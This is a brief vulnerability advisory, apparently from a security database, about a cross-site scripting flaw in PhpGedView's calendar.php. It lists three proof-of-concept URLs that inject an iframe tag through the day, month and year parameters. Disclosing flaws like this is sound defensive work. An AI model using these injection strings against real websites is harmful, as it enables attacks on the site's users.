|
PhpGedView Calendar.PHP Cross-Site Scripting Vulnerability
No exploit is required and the following proof of concepts are available: http://www.example.com/phpgedview/calendar.php?action=today&day=1&month=jan&year="><iframe> http://www.example.com/phpgedview/calendar.php?action=today&day=1&month=<iframe> http://www.example.com/phpgedview/calendar.php?action=today&day=<iframe> |
|
|
Privacy Statement |